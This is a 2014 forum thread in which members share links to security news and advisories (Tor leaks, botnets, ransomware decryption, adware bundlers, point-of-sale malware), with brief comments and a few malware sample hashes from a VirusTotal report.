Mobile Tor-browsers leak user's IP-address: http://xordern.net/ip-leakage-of-mobile-tor-browsers.html
article author Dominik Bok
check the mobile Tor browser here: http://xordern.net/ip-leakage-check.html
polonus
-
Furor Erupts Over Facebook's Experiment on Users
Almost 700,000 Unwitting Subjects Had Their Feeds Altered to Gauge Effect on Emotion
http://online.wsj.com/articles/furor-erupts-over-facebook-experiment-on-users-1404085840?mod=Tech_newsreel_1 (http://online.wsj.com/articles/furor-erupts-over-facebook-experiment-on-users-1404085840?mod=Tech_newsreel_1)
-
Microsoft takes on global cybercrime epidemic in tenth malware disruption
http://blogs.technet.com/b/microsoft_blog/archive/2014/06/30/microsoft-takes-on-global-cybercrime-epidemic-in-tenth-malware-disruption.aspx
https://www.noip.com/blog/2014/06/30/ips-formal-statement-microsoft-takedown/
-
Facebook: Unethical, untrustworthy, and now downright harmful. (http://www.zdnet.com/facebook-unethical-untrustworthy-and-now-downright-harmful-7000031106/)
Seriously contemplating Kissing Facebook Bye Bye...
-
Serious hole in popular WP-plugin patched: https://wordpress.org/plugins/wysija-newsletters/
polonus
-
Russian Hackers Targeting Oil and Gas Companies
http://www.nytimes.com/2014/07/01/technology/energy-sector-faces-attacks-from-hackers-in-russia.html?ref=technology&_r=1 (http://www.nytimes.com/2014/07/01/technology/energy-sector-faces-attacks-from-hackers-in-russia.html?ref=technology&_r=1)
@ bob3160,
It was time to leave a long time ago. It's one of the things they can do with their data.
-
Facebook: Unethical, untrustworthy, and now downright harmful. (http://www.zdnet.com/facebook-unethical-untrustworthy-and-now-downright-harmful-7000031106/)
Seriously contemplating Kissing Facebook Bye Bye...
How to delete or disable your Facebook account | TechHive
http://www.techhive.com/article/2050324/how-to-delete-or-disable-your-facebook-account.html#tk.nl_pwr (http://www.techhive.com/article/2050324/how-to-delete-or-disable-your-facebook-account.html#tk.nl_pwr)
-
Microsoft Security Bulletin Advance Notification for July 2014
https://technet.microsoft.com/library/security/ms14-jul
-
Low budget Tor de-anonymization realised: https://www.blackhat.com/us-14/briefings.html#you-dont-have-to-be-the-nsa-to-break-tor-deanonymizing-users-on-a-budget
link article authors: Alexander Volynkin & Michael McCord
polonus
-
Beware! FileHippo tests adware distributing download manager
http://www.ghacks.net/2014/07/08/beware-filehippo-tests-adware-distributing-download-manager/
-
CryptoWall malware beaten by R-Studio recovery tool:
http://www.wyattroersma.com/?p=108
(link artticle author Wyatt Roersma)
polonus
-
Some free software does not always come free!
Why one should shun and avoid bloatware: http://www.cert.org/blogs/certcc/post.cfm?EntryID=199
link arfticle author = Will Dormann
polonus
-
Some free software does not always come free!
Why one should shun and avoid bloatware: http://www.cert.org/blogs/certcc/post.cfm?EntryID=199 (http://www.cert.org/blogs/certcc/post.cfm?EntryID=199)
link arfticle author = Will Dormann
polonus
Just to clarify.
When ever Download.com Offers their big and prominent Downloader which includes the unwanted
the unwanted software, they also offer a "Direct Download" button usually in much smaller letters directly under the unwanted Downloader.
Always choose the "Direct Download" option.
-
jQuery Bad Behavior - about jQuery Selector Injection, one of the deadliest Web Attacks. Front-end developers and coders should listen to Mike Shema and take their precautions. Read here: http://deadliestwebattacks.com/tag/jquery/
polonus
-
Cybercriminals try to re-launch GameOver botnet: http://blog.malcovery.com/blog/breaking-gameover-zeus-returns
Link article authors: Brendan Griffin and Gary Warner
polonus
P.S. 10 AV-solutions detect the malware.
-
Some free software does not always come free!
Why one should shun and avoid bloatware: http://www.cert.org/blogs/certcc/post.cfm?EntryID=199 (http://www.cert.org/blogs/certcc/post.cfm?EntryID=199)
link arfticle author = Will Dormann
polonus
Just to clarify.
When ever Download.com Offers their big and prominent Downloader which includes the unwanted
the unwanted software, they also offer a "Direct Download" button usually in much smaller letters directly under the unwanted Downloader.
Always choose the "Direct Download" option.
As does filehippo. As always it's generally best to do a custom install.
-
Hi Para-Noid,
Then you always should have this last-resort tool, the Junkware renoval tool : http://thisisudax.org/download
but that is to put the cart before the horse, better do a custom install yo avoid bloatware, junk and crap.
Damian
Junkware Removal Tool is a security utility that searches for and removes common adware, toolbars, and potentially unwanted programs (PUPs) from your computer. A common tactics among freeware publishers is to offer their products for free, but bundle them with PUPs in order to earn revenue. This tool will help you remove these types of programs.
Junkware Removal Tool has the ability to remove the following types of programs:
• Ask Toolbar
• Babylon
• Browser Manager
• Claro / iSearch
• Conduit
• Coupon Printer for Windows
• Crossrider
• Facemoods / Funmoods
• iLivid
• IncrediBar
• MyWebSearch
• Searchqu
• Web Assistant
D
-
Hi Para-Noid,
Then you always should have this last-resort tool, the Junkware renoval tool : http://thisisudax.org/download (http://thisisudax.org/download)
but that is to put the cart before the horse, better do a custom install yo avoid bloatware, junk and crap.
Damian
Something I recommended over a year ago. :)
https://forum.avast.com/index.php?topic=19387.msg968367#msg968367 (https://forum.avast.com/index.php?topic=19387.msg968367#msg968367)
-
Microsoft Security Advisory 2982792
Improperly Issued Digital Certificates Could Allow Spoofing
https://technet.microsoft.com/en-us/library/security/2982792
-
Quote from bob3160:
Something I recommended over a year ago. :)
https://forum.avast.com/index.php?topic=19387.msg968367#msg968367
Thanks for confirming this is a good advice/choice.
Good we give likewise advice independantly,
because we must have something in common being here on these forums that long ;D
Damian
-
jQuery Bad Behavior - about jQuery Selector Injection, one of the deadliest Web Attacks. Front-end developers and coders should listen to Mike Shema and take their precautions. Read here: http://deadliestwebattacks.com/tag/jquery/
polonus
Interesting read. Thanks for the link polonus.
~!Donovan
-
Gameover Zeus botnet immortal, like the greek god: http://blog.malcovery.com/blog/breaking-gameover-zeus-returns
link article authors: Brendan Griffin and Gary Warner
Using dynamic IP and FastFlux C&C, techniques learnt from spammers, and domain generation on the fly is why botnets will win the race over security forces trying to take them down.
polonus
-
Digital First Aid: https://digitaldefenders.org/digitalfirstaid/
link source DigiDefenders
polonus
-
As forum friends here may have noticed from my constant reporting in the "virus and worms sector"
a lot of so-called SE redirects are often going under the detection radar.
See an example here: https://forum.avast.com/index.php?topic=151778.msg1104900#msg1104900
Fort he only scanner to detect this, see this malware scanner report at killmalware: http://killmalware.com/ffinlo.com/#
Sometimes this SE redirect spam or click fraud lives only for a couple of hours or days. Sometimes it is more persistent.
Here is a handy tool to work on your site to detect SE Spam: http://tool.motoricerca.info/spam-detector/
polonus
-
It's always nice to get a clean bill of health.:)
http://evuln.com/tools/malware-scanner/bob3160.blogspot.com/ (http://evuln.com/tools/malware-scanner/bob3160.blogspot.com/)
http://killmalware.com/mlpaa.org/ (http://killmalware.com/mlpaa.org/)
-
Hi bob3160,
All OK on the spam detector for http://bob3160.blogspot.com/ , see attached image.
Damian
-
SSL Blacklist: https://sslbl.abuse.ch/
List author = Roman Huessy, introducing the list here: http://www.abuse.ch/?p=8180
polonus
-
yepp.... i still trust my memory. ;)
Popular password protection programs p0wnable
http://www.theregister.co.uk/2014/07/14/popular_web_password_vaults_blurting_codes/
The Emperor’s New Password Manager: Security Analysis of Web-based Password Managers
pdf.doc http://devd.me/papers/pwdmgr-usenix14.pdf
-
Beware Keyloggers at Hotel Business Centers
http://krebsonsecurity.com/2014/07/beware-keyloggers-at-hotel-business-centers/
-
CNET attacked by Russian hacker group
http://www.cnet.com/news/cnet-attacked-by-russian-hacker-group/
-
European cloud data not protected against US Government
Read: http://www.zdnet.com/blog/igeneration/microsoft-admits-patriot-act-can-access-eu-based-cloud-data/11225
link article author = Zack Whittaker
polonus
-
Beware Keyloggers at Hotel Business Centers
http://krebsonsecurity.com/2014/07/beware-keyloggers-at-hotel-business-centers/
There was an interesting article in this morning's Sophos newsletter -- the German government is seriously considering abandoning email entirely and switching to old-fashioned typewriters for communications. And not even electric, let alone electronic, ones, they're talking about antique totally-manual machines. I was surprised to learn that key-logging devices go all the way back to the IBM Selectric, probably the most widely used electric typewriter ever.
-
Beware Keyloggers at Hotel Business Centers
http://krebsonsecurity.com/2014/07/beware-keyloggers-at-hotel-business-centers/
There was an interesting article in this morning's Sophos newsletter -- the German government is seriously considering abandoning email entirely and switching to old-fashioned typewriters for communications. And not even electric, let alone electronic, ones, they're talking about antique totally-manual machines. I was surprised to learn that key-logging devices go all the way back to the IBM Selectric, probably the most widely used electric typewriter ever.
Interesting comment.
With IoT devices on the way, (if they're not here already) expect more of the same, maybe worse. IoT devices don't sell, then maybe less of a security concern.
http://en.wikipedia.org/wiki/Internet_of_Things (http://en.wikipedia.org/wiki/Internet_of_Things)
-
CNET Hacked!
http://www.cnet.com/news/cnet-attacked-by-russian-hacker-group/
-
CNET Hacked!
http://www.cnet.com/news/cnet-attacked-by-russian-hacker-group/ (http://www.cnet.com/news/cnet-attacked-by-russian-hacker-group/)
I think you're a little late....Sometimes, one needs to look up :)
https://forum.avast.com/index.php?topic=52252.msg1106150#msg1106150 (https://forum.avast.com/index.php?topic=52252.msg1106150#msg1106150)
-
Does cars come with Antivirus in the future?
Chinese hackers take command of Tesla Model S
http://www.cnet.com/news/chinese-hackers-take-command-of-tesla-model-s/
-
NSA critics: Dropbox hostile to privacy
Read: http://www.theguardian.com/technology/2014/jul/17/edward-snowden-dropbox-privacy-spideroak
For more secure alternatives, see: ( http://lifehacker.com/the-best-cloud-storage-services-that-protect-your-priva-729639300 )
For a more secure alternative: http://www.arxshare.com
polonus
-
NSA critics: Dropbox hostile to privacy
Read: hxxp://www.theguardian.com/technology/2014/jul/17/edward-snowden-dropbox-privacy-spideroak
For more secure alternatives, see: ( hxxp://lifehacker.com/the-best-cloud-storage-services-that-protect-your-priva-729639300 )
For a more secure alternative: hxxp://www.arxshare.com
polonus
I use dropbox, for some images and files. But in all honesty I don't store anything on any on-line storage that is in any way confidential/private.
I simply don't trust any on-line storage, regardless of its supposed privacy protection and stick to my normal adage don't publish/store anything on-line that you do not wish to be seen/accessed by anyone.
-
Worst passwords of 2013!
http://splashdata.com/press/worstpasswords2013.htm
-
Google's Chrome Web Browser Is Killing Your Laptop Battery
http://www.forbes.com/sites/ianmorris/2014/07/14/googles-chrome-web-browser-is-killing-your-laptop-battery/
-
Google's Chrome Web Browser Is Killing Your Laptop Battery
http://www.forbes.com/sites/ianmorris/2014/07/14/googles-chrome-web-browser-is-killing-your-laptop-battery/ (http://www.forbes.com/sites/ianmorris/2014/07/14/googles-chrome-web-browser-is-killing-your-laptop-battery/)
I guess it's a good thing that my laptop is always plugged in. :)
-
EFF states that the HTTP protocol should die completely and should definitely be gone from the Internet,
this because it is unencrypted and because of NSA-critical revelations etc.
Read: http://www.tomsguide.com/us/http-must-die,news-19188.html link article author Paul Wagenseil
Only ads and content delivery (trackers) are still in need of HTTP, and also is avast! av, because it cannot scan inside HTTPS :o ::).
So insecure HTTPS is not flagged, certification issues only reported by Google and Comodo????
What about insecure policies alerted? (Recx Security Analyser for Google Chrome, Calomel SSL-validation add-on for firefox ;D ).
The EEF standpoint can be read here: https://www.eff.org/event/hope-x
polonus
-
Interesting observation to the above issue:
It appears that every Alexa-ranked company from China offers NO SSL, which facilitates gov censorship and Amazon, Yandex, Instagram, Ebay, Craigslist all force http (as does OpenDNS non-dashboard use), likely due to mixed content.
- Quote taken from list link below.
See list link: https://docs.google.com/spreadsheets/d/1HirCBS8bK89-jPrLc2cmru48R-3s9mUTJVwni3DO_Sw/pubhtml
pol
-
EFF states that the HTTP protocol should die completely and should definitely be gone from the Internet,
this because it is unencrypted and because of NSA-critical revelations etc.
Read: http://www.tomsguide.com/us/http-must-die,news-19188.html (http://www.tomsguide.com/us/http-must-die,news-19188.html) link article author Paul Wagenseil
Only ads and content delivery (trackers) are still in need of HTTP, and also is avast! av, because it cannot scan inside HTTPS <$1alt="" title="" onresizestart="return false;" id="smiley__$2" style="padding: 0 3px 0 3px;" /> <$1alt="" title="" onresizestart="return false;" id="smiley__$2" style="padding: 0 3px 0 3px;" />.
So insecure HTTPS is not flagged, certification issues only reported by Google and Comodo?<$1alt="" title="" onresizestart="return false;" id="smiley__$2" style="padding: 0 3px 0 3px;" />
What about insecure policies alerted? (Recx Security Analyser for Google Chrome, Calomel SSL-validation add-on for firefox <$1alt="" title="" onresizestart="return false;" id="smiley__$2" style="padding: 0 3px 0 3px;" /> ).
The EEF standpoint can be read here: https://www.eff.org/event/hope-x (https://www.eff.org/event/hope-x)
polonus
Well it has been an aspiration of avast to be able to scan https content, in so much as it does with secure email traffic. But I rather think it is more complex than that simple explanation and no date/time frame or avast version was given for these aspirations.
-
Hi DavidR,
I fully understand what you mean to say.
Reality and the EFF desired development are two quite different things.
It also isn't clear what is reality here.
It is all a little too little and too late.
These developments should have started years and years ago.
Now with hindsight knowledge we have quite another view of what http: security is.
polonus
-
This is just sick!
http://www.dailymail.co.uk/news/article-2699425/Facebook-scammers-prey-Aussie-MH17-victims-setting-fake-tribute-pages-names-drive-traffic-dodgy-pop-ad-site.html
-
not new, but not sure if it has been posted
Beware! FileHippo tests adware distributing download manager
https://www.ghacks.net/2014/07/08/beware-filehippo-tests-adware-distributing-download-manager/
What is the FileHippo Download Manager?
http://www.filehippo.com/de/filehippo_download_manager
-
not new, but not sure if it has been posted
Beware! FileHippo tests adware distributing download manager
https://www.ghacks.net/2014/07/08/beware-filehippo-tests-adware-distributing-download-manager/ (https://www.ghacks.net/2014/07/08/beware-filehippo-tests-adware-distributing-download-manager/)
What is the FileHippo Download Manager?
http://www.filehippo.com/de/filehippo_download_manager (http://www.filehippo.com/de/filehippo_download_manager)
Always use the Direct Download link just as on Cnet.com
-
WSJ Takes Some Computer Systems Offline After Cyber Intrusion
http://online.wsj.com/articles/wsj-takes-some-computer-systems-offline-after-cyber-intrusion-1406074055?mod=dist_smartbrief (http://online.wsj.com/articles/wsj-takes-some-computer-systems-offline-after-cyber-intrusion-1406074055?mod=dist_smartbrief)
-
July 2014 update for Microsoft Silverlight 5
http://support.microsoft.com/kb/2977218 (http://support.microsoft.com/kb/2977218)
This update follows two earlier updates on July 9, 2014 (Microsoft Tuesday):
http://support.microsoft.com/kb/2847559/en-us (http://support.microsoft.com/kb/2847559/en-us)
http://support.microsoft.com/kb/2861561/en-us (http://support.microsoft.com/kb/2861561/en-us)
Out-of band update.
-
Mashable – Chromecast Hack Lets You Rickroll Your Neighbor’s TV
http://www.bishopfox.com/news/2014/07/mashable-chromecast-hack-lets-rickroll-neighbors-tv/
http://www.bishopfox.com/news/2014/07/business-insider/
http://www.bishopfox.com/news/2014/07/daily-dot-incredibly-easy-hijack-google-chromecast/
-
Mashable – Chromecast Hack Lets You Rickroll Your Neighbor’s TV
http://www.bishopfox.com/news/2014/07/mashable-chromecast-hack-lets-rickroll-neighbors-tv/ (http://www.bishopfox.com/news/2014/07/mashable-chromecast-hack-lets-rickroll-neighbors-tv/)
http://www.bishopfox.com/news/2014/07/business-insider/ (http://www.bishopfox.com/news/2014/07/business-insider/)
http://www.bishopfox.com/news/2014/07/daily-dot-incredibly-easy-hijack-google-chromecast/ (http://www.bishopfox.com/news/2014/07/daily-dot-incredibly-easy-hijack-google-chromecast/)
Not quite that easy unless your WiFi is unprotected.
If that's the case, you probably deserve to have your Chromecast hijacked.
-
Related issue to bob3160's post above (wireless):
How Thieves Can Hack and Disable Your Home Alarm System
http://www.wired.com/2014/07/hacking-home-alarms (http://www.wired.com/2014/07/hacking-home-alarms)
-
Related issue to bob3160's post above (wireless):
How Thieves Can Hack and Disable Your Home Alarm System
http://www.wired.com/2014/07/hacking-home-alarms (http://www.wired.com/2014/07/hacking-home-alarms)
Many years ago, I hired a colt 45 to keep my premises safe.
Except for the initial investment, it's been a good, reliable and relatively inexpensive investment. :)
-
Many years ago, I hired a colt 45 to keep my premises safe.
Except for the initial investment, it's been a good, reliable and relatively inexpensive investment. :)
Bob, this might work in the USA, but certainly not in Europe. ;)
-
Russia Offers 4 Million Rubles to Crack the Tor Network
http://globalvoicesonline.org/2014/07/24/russia-tor-privacy-nsa/
http://www.theregister.co.uk/2014/07/25/putin_crack_tor_for_me_and_ill_make_you_a_millionaire/
http://rt.com/politics/russia-tor-anonymizer-ban-571/
-
The Web never forgets: Persistent tracking mechanisms in the wild
https://securehomes.esat.kuleuven.be/~gacar/persistent/index.html
-
Many years ago, I hired a colt 45 to keep my premises safe.
Except for the initial investment, it's been a good, reliable and relatively inexpensive investment. :)
Thankfully most countries are civilised enough so people don't need to arm themselves to feel safe. ;)
-
Gppgle Adsense Clickfraud by Russian GoodGoogle competition, read:
http://krebsonsecurity.com/2014/07/service-drains-competitors-online-ad-budget/
link article author = Brian Krebs
polonus
-
Related issue to bob3160's post above (wireless):
How Thieves Can Hack and Disable Your Home Alarm System
http://www.wired.com/2014/07/hacking-home-alarms (http://www.wired.com/2014/07/hacking-home-alarms)
Many years ago, I hired a colt 45 to keep my premises safe.
Except for the initial investment, it's been a good, reliable and relatively inexpensive investment. :)
Works here as well!
-
How Much Can We Trust PUA Installers?
http://www.opswat.com/blog/how-much-can-we-trust-pua-installers
-
Easily monitor and secure your computer with GEARS
http://www.opswatgears.com/download
-
Securing your browser: Internet Explorer
http://blogs.norman.com/2014/for-consumption/securing-your-browser-internet-explorer
Why should I sign-out of my accounts?
http://blogs.norman.com/2014/for-consumption/why-should-i-sign-out-of-my-accounts
-
Tor security advisory: "relay early" traffic confirmation attack
https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack
-
Average Internet of Things device has 25 security flaws
http://www.telegraph.co.uk/technology/internet-security/11000013/Average-Internet-of-Things-device-has-25-security-flaws.html (http://www.telegraph.co.uk/technology/internet-security/11000013/Average-Internet-of-Things-device-has-25-security-flaws.html)
-
MDN Database Disclosure
https://blog.mozilla.org/security/2014/08/01/mdn-database-disclosure/
-
Poweliks: the persistent malware without a file
https://blog.gdatasoftware.com/blog/article/poweliks-the-persistent-malware-without-a-file.html
http://thehackernews.com/2014/08/poweliks-persistent-windows-malware.html
Office documents using CVE-2012-0158:
74e0d21fe9edf7baf489e29697fff8bc4a6af811e6fe3027842fe96f6a00a2d9
88bc64e5717a856b01a04684c7e69114d309d52a885de9fc759e5a99ac20afd5
https://www.virustotal.com/nb/file/74e0d21fe9edf7baf489e29697fff8bc4a6af811e6fe3027842fe96f6a00a2d9/analysis/
https://www.virustotal.com/nb/file/88bc64e5717a856b01a04684c7e69114d309d52a885de9fc759e5a99ac20afd5/analysis/
The Poweliks installer (creates the registry keys):
4727b7ea70d0fc00f96a28de7fa3d97fa9d0b253bd63ae54fbbf0bd0c8b766bb
e8d6943742663401e5c44a5fa9cfdd8fad6a9a0dc0f886dc77c065a86c0e10aa
https://www.virustotal.com/nb/file/4727b7ea70d0fc00f96a28de7fa3d97fa9d0b253bd63ae54fbbf0bd0c8b766bb/analysis/
https://www.virustotal.com/nb/file/e8d6943742663401e5c44a5fa9cfdd8fad6a9a0dc0f886dc77c065a86c0e10aa/analysis/
-
Cybercrime attacks points-of-sale via standard passwords: https://www.us-cert.gov/ncas/alerts/TA14-212A
polonus
-
Re-posted here https://forum.avast.com/index.php?topic=153117.msg1113063#msg1113063
I gave credit to polonus. 8)
-
@Para-Noid,
Thanks, my good friend, for spreading the heads-up on this.
And on the Cyber Crime tracker site keep an eye out for a cyber-crime bot like Alina and friends.
No Alina is not some friendly lady, read here: https://forum.avast.com/index.php?topic=149713.0
Search Alina's family here: http://cybercrime-tracker.net/index.php?s=0&m=40&search=Alina
pol
-
Re-posted here https://forum.avast.com/index.php?topic=153117.msg1113063#msg1113063 (https://forum.avast.com/index.php?topic=153117.msg1113063#msg1113063)
I gave credit to polonus. <$1alt="" title="" onresizestart="return false;" id="smiley__$2" style="padding: 0 3px 0 3px;" />
I don't understand ??? Did Polonus discover this attack ??? :)
-
Polonus posted the link to the news (threat detected by the Department of Homeland Security),
but where Alina point-of-sales bot is concerned I was the first one out here on the forums to claim attention to it.
Mind you that in a lot of large department stores Win-XP still is the underlying software at the counter
(quite a cyber crime risk to say the least).
I think Para-Noid just wanted to be friendly and we both pass the credits for the link
and the detection of the threat to the US Department of Homeland Security Officials.
Credits will go where credits are due.
polonus
-
Malware downloads used to identify Tor-users: http://www.wired.com/2014/08/operation_torpedo/
pol
-
Russian Gang Amasses Over a Billion Internet Passwords
http://www.nytimes.com/2014/08/06/technology/russian-gang-said-to-amass-more-than-a-billion-stolen-internet-credentials.html?hp&action=click&pgtype=Homepage&version=LedeSum&module=first-column-region%C2%AEion=top-news&WT.nav=top-news&_r=0
-
FireEye and FoxIT have snaffled the decode keys for 500,000 victims of crypto ransome ware
Decrypt site : https://www.decryptcryptolocker.com/ (https://www.decryptcryptolocker.com/)
Blurb : http://betanews.com/2014/08/06/get-out-of-jail-free-card-for-cryptolocker-victims/ (http://betanews.com/2014/08/06/get-out-of-jail-free-card-for-cryptolocker-victims/)
-
Russian Gang Amasses Over a Billion Internet Passwords
http://www.nytimes.com/2014/08/06/technology/russian-gang-said-to-amass-more-than-a-billion-stolen-internet-credentials.html?hp&action=click&pgtype=Homepage&version=LedeSum&module=first-column-region%C2%AEion=top-news&WT.nav=top-news&_r=0
More from CNN here http://money.cnn.com/2014/08/05/technology/security/russian-hackers-theft/index.html?hpt=hp_t1
-
Isn't it time to change your password whenever you visited one of these 420.000 :o sites, hacked via SQL injection flaws?
Read: http://www.holdsecurity.com/news/cybervor-breach/
polonus
-
Don't just trust any link on your smartphone: http://securelist.com/blog/virus-watch/65459/android-worm-on-chinese-valentines-day/
link article author = Securelist's Vigi Zhang.
polonus
-
Isn't it time to change your password whenever you visited one of these 420.000 :o sites, hacked via SQL injection flaws?
Read: http://www.holdsecurity.com/news/cybervor-breach/
polonus
Since Hold Security isn't identifying the exploited sites so we know where its now safe to change a password (non-disclosure is such a convenient CYA mechanism), might we rely on AOS to check for "SQL injection flaws" before it puts that green check mark next to a site name?
-
Isn't it time to change your password whenever you visited one of these 420.000 :o sites, hacked via SQL injection flaws?
Read: http://www.holdsecurity.com/news/cybervor-breach/
polonus
Since Hold Security isn't identifying the exploited sites so we know where its now safe to change a password (non-disclosure is such a convenient CYA mechanism), might we rely on AOS to check for "SQL injection flaws" before it puts that green check mark next to a site name?
Since SQL injection is outside of what AOS is actually monitoring, it isn't checking page content (script injection, etc.) as such, then No it won't. Adding 420,000 + sites to a list (like the known malicious sites) for checking it likely to impact on browsing.
The web shield is more likely to detect SQL injection as that is looking at source code, etc. Presumably this SQL injection would probably take you to (or run code on) another site. This is the sort of thing that the web shield is looking at.
-
Hi merckxist,
Apart from the SQL threat, considering the overall website security situation of sites on the Interwebs to-day -
it is a good policy to change passwords once in a while over time.
Once bitten twice shy, ( where I point at what happened to these support forums recently)
Your reaction shows that you are fully aware of the present password security situation.
polonus
P.S.
DavidR and I are using script blocking on sites (e.g. No Script) as a good form of protection against third party threats.
-
Researchers release CryptoLocker decryption tool
https://www.virusbtn.com/blog/2014/08_06.xml
https://forum.avast.com/index.php?topic=153229.0
-
WordPress 3.9.2 Security Release
http://wordpress.org/news/2014/08/wordpress-3-9-2/
-
Google will give a better ranking to https sites over http sites.
This as a security priority. Or is this security through obscurity measure?
So it will be high time av scanners could scan within SSL sites now.
Read on the Google Blog: http://googleonlinesecurity.blogspot.ca/2014/08/https-as-ranking-signal_6.html
polonus
-
IE plays security catch-up, will block outdated Java plug-ins
http://www.computerworld.com/s/article/9250209/IE_plays_security_catch_up_will_block_outdated_Java_plug_ins?taxonomyId=85
-
Windows 8.1 biz users face patch freeze as Microsoft sets critical updates
http://www.computerworld.com/s/article/9250240/Windows_8.1_biz_users_face_patch_freeze_as_Microsoft_sets_critical_updates?taxonomyId=85
-
Cybercrime only costs a fraction of the damage it does.
polonus
-
Microsoft Security Bulletin Advance Notification for August 2014
https://technet.microsoft.com/library/security/ms14-aug
-
Is your neighbor's cat gone a-wardriving, is this a normal flea band or one going to break into your WiFi router?
Read: https://defcon.org/html/defcon-22/dc-22-speakers.html#Bransfield Gene Bransfieldlink article author =
What is out there on the hot tin roof?
pol
-
Does Avast fix or remove Powelik?
-
Does Avast fix or remove Powelik?
Please start your own topic..!!
-
Spy agencies hit in cyber espionage campaign: Kaspersky Lab
http://www.reuters.com/article/2014/08/07/us-cybersecurity-hackers-epicturla-idUSKBN0G71LU20140807 (http://www.reuters.com/article/2014/08/07/us-cybersecurity-hackers-epicturla-idUSKBN0G71LU20140807)
-
Mobile chips face lockdown to prevent hacks
http://www.itworld.com/hardware/431003/mobile-chips-face-lockdown-prevent-hacks (http://www.itworld.com/hardware/431003/mobile-chips-face-lockdown-prevent-hacks)
-
Patient malware big threat to VM, only 18% of malware halted by a VM, read: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/threats_to_virtual_environments.pdf
polonus
-
Malicious Tor Browser version launched via fake Tor-website:
http://dustri.org/b/torbundlebrowserorg.html link article author = Julien Voisin.
Infesting users via fake almost identical copies of original websites seems to become a new trend.
polonus
-
Posted here too https://forum.avast.com/index.php?topic=66267.msg1115643#msg1115643
-
Anyway hope those concerned and dependent on tor anonymity saw these latest alerts.
Sorry Asyn for the "doublure". ;D
polonus
-
Gamma FinFisher hacked: 40 GB of internal documents and source code of government malware published
https://netzpolitik.org/2014/gamma-finfisher-hacked-40-gb-of-internal-documents-and-source-code-of-government-malware-published/
-
A new colour for your Facebook profile? It's a scam
http://www.theguardian.com/technology/2014/aug/07/facebook-profile-colour-scam
-
Satellite communications hacked!
http://www.nbcchicago.com/investigations/Security-Expert-Discovers-Hole-In-Satellite-Communications-271779971.html
-
Ebola fear used as bait, leads to malware infection
http://www.deccanchronicle.com/140818/technology-science-and-trends/article/ebola-fear-used-bait-leads-malware-infection (http://www.deccanchronicle.com/140818/technology-science-and-trends/article/ebola-fear-used-bait-leads-malware-infection)
-
U.S. Finds ‘Backoff’ Hacker Tool Is Widespread
http://bits.blogs.nytimes.com/2014/08/22/secret-service-warns-1000-businesses-on-hack-that-affected-target/
-
Lots of US firms infested with POS malware: https://www.us-cert.gov/ncas/alerts/TA14-212A
pol
-
Blocking anonymity software like Tor, Ultrasurf, Hide My Ass, OpenVPN, CoralCDN as a top priority on the work-floor.
Read: http://www.checkpoint.com/documents/ebooks/security-report-2014/files/assets/common/downloads/Check%20Point%20Security%20Report%202014.pdf
pol
-
Sub-domain on SourceForge redirects to Flash Pack Exploit Kit (https://blog.malwarebytes.org/exploits-2/2014/08/sub-domain-on-sourceforge-redirects-to-flash-pack-exploit-kit/)
Thanks to an article in : http://billmullins.wordpress.com/2014/08/26/tech-thoughts-daily-net-news-august-26-2014/ (http://billmullins.wordpress.com/2014/08/26/tech-thoughts-daily-net-news-august-26-2014/)
-
Secunia Country Reports
The Secunia Country Reports tell you how much vulnerable software is present on private PCs in your country, plus a few extra, interesting facts.
http://secunia.com/resources/countryreports/?utm_campaign=Q3_2014_Corporate%20Newsletter%20August%2028&utm_medium=email&utm_source=Eloqua&elq=671fcd4b880949489bbf3f54996023b0&elqCampaignId=857 (http://secunia.com/resources/countryreports/?utm_campaign=Q3_2014_Corporate%20Newsletter%20August%2028&utm_medium=email&utm_source=Eloqua&elq=671fcd4b880949489bbf3f54996023b0&elqCampaignId=857)
Out-of-date/end-of-life third-party software and system non-updates are a known way in for malware infections.
-
14 antivirus apps found to have security problems
http://www.theregister.co.uk/2014/07/29/antivirus_blood_splattered_as_biz_warned_audit_or_die/
pdf.doc here http://mincore.c9x.org/breaking_av_software.pdf
Antivirus products riddled with security flaws, researcher says
http://www.pcworld.com/article/2459760/antivirus-products-riddled-with-security-flaws-researcher-says.html
-
14 antivirus apps found to have security problems
http://www.theregister.co.uk/2014/07/29/antivirus_blood_splattered_as_biz_warned_audit_or_die/
pdf.doc here http://mincore.c9x.org/breaking_av_software.pdf
Not signing product updates and delivering those over insecure HTTP, running excessive old code and not conducting proper source code reviews and fuzzing
Seems avast! is ok.
Besides the tone, which I do not like at all, avast! was one of the most tested antivirus and due to bug bounty program, we got they fixed.
-
PUAs Open the Door to System Vulnerabilities
http://www.opswat.com/blog/puas-open-the-door-system-vulnerabilities
-
Landfill.bugzilla.org Disclosure
http://bugzillaupdate.wordpress.com/2014/08/27/landfill-bugzilla-org-disclosure/
-
Sadly just added to my newest presentation "Security Is Everyones Business" (https://docs.google.com/document/d/1kCzvKHaOiOgfAk1NuDnko-w0uqpgzj7Yx_LOIet23_Y/edit?usp=sharing)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1409748047991-5217.png)
-
For the Facebook users, Privacy Checkup is now rolling out. (http://newsroom.fb.com/news/2014/09/privacy-checkup-is-now-rolling-out/)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1409921949018-52542.png) (http://newsroom.fb.com/news/2014/09/privacy-checkup-is-now-rolling-out/)
-
In the news – car hacking, plane hacking and exploitable UEFI BIOS
http://blogs.norman.com/2014/business/in-the-news-car-hacking-plane-hacking
-
Hole in popular WordPress-plug-in abused actively: http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
pol
-
107.000 websites no longer trusted by Mozilla https://community.rapid7.com/community/infosec/sonar/blog/2014/09/04/107000-web-sites-no-longer-trusted-by-mozilla (artcle author = Project Sonar's J.Nickel)
Also read: https://kuix.de/blog/ (blog author Karl Engert).
When will this come to Chrome as well. When will we be alerted?
polonus
-
107.000 websites no longer trusted by Mozilla https://community.rapid7.com/community/infosec/sonar/blog/2014/09/04/107000-web-sites-no-longer-trusted-by-mozilla (https://community.rapid7.com/community/infosec/sonar/blog/2014/09/04/107000-web-sites-no-longer-trusted-by-mozilla) (artcle author = Project Sonar's J.Nickel)
Also read: https://kuix.de/blog/ (https://kuix.de/blog/) (blog author Karl Engert).
When will this come to Chrome as well. When will we be alerted?
polonus
Something you need to ask Google not the avast! forum members.....
-
Hi bob3160,
I hope the avast members will ask Google on our behalf ;D as well as all will benefit.
Damian
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1410277405958-3587.png)
